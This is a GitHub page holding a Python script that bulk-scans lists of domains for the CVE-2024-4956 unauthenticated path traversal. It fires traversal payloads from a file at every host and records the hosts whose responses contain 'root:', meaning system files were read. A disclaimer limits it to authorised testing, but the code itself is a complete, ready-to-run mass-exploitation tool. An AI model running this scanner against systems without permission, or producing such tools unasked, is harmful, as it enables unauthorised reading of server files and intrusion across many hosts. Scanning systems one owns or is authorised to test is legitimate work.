-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathCVE-2024-4956-scanner.py
90 lines (73 loc) · 3.41 KB
/
CVE-2024-4956-scanner.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# [CVE-2024-4956] Unauthenticated Path Traversal Bulk Scanner
# Intended only for educational and testing in corporate environments.
# https://twitter.com/nav1n0x/ https://github.com/ifconfig-me takes no responsibility for the code, use at your own risk.
# Do not attack a target you don't have permission to engage with.
import asyncio
import aiohttp
import argparse
from colorama import init, Fore, Style
RATE_LIMIT = 15
DELAY = 0.5 # 500 ms delay
TIMEOUT = 3 # 3 seconds timeout
init(autoreset=True)
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
successful_attempts = 0
ascii_art = """
____
____ _____ ___ _/_ | ____
/ \\\\__ \\\\ \\/ /| |/ \\
| | \\/ __ \\\\ / | | | \\
|___| (____ /\\_/ |___|___| /
\\/ \\/ \\/ CVE-2024-4956-scanner
"""
print(Fore.CYAN + ascii_art + Style.RESET_ALL)
async def send_request(session, domain, payload, index, total):
global successful_attempts
url = f"{domain}/{payload}"
print(f"Testing URL {index + 1}/{total}: {domain}", end='', flush=True)
try:
async with session.get(url, headers=headers, ssl=False, timeout=TIMEOUT) as response:
content = await response.text()
if "root:" in content:
with open("successful_urls.txt", "a") as file:
file.write(f"{domain}\n")
successful_attempts += 1
print(f" {Fore.GREEN}{Style.BRIGHT}Success")
else:
print(f" {Fore.RED}{Style.BRIGHT}Fail")
except asyncio.TimeoutError:
print(f" {Fore.RED}{Style.BRIGHT}Timeout")
except Exception as e:
print(f" {Fore.RED}{Style.BRIGHT}Fail")
async def main(domains_file, payloads_file):
global successful_attempts
async with aiohttp.ClientSession() as session:
with open(domains_file, "r") as file:
domains = file.read().splitlines()
with open(payloads_file, "r") as file:
payloads = file.read().splitlines()
total_targets = len(domains) * len(payloads)
print(f"{Fore.BLUE}Total targets to scan: {total_targets}")
index = 0
for domain in domains:
domain = domain.strip()
if not domain.startswith('http://') and not domain.startswith('https://'):
domain = 'http://' + domain
for payload in payloads:
await send_request(session, domain, payload, index, total_targets)
index += 1
print(f"{Fore.BLUE}Task execution completed.")
print(f"{Fore.GREEN}Successful attempts: {successful_attempts}/{total_targets}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Scan domains with multiple payloads")
parser.add_argument("-d", "--domains", required=True, help="File containing list of domains")
parser.add_argument("-p", "--payloads", required=True, help="File containing list of payloads")
args = parser.parse_args()
asyncio.run(main(args.domains, args.payloads))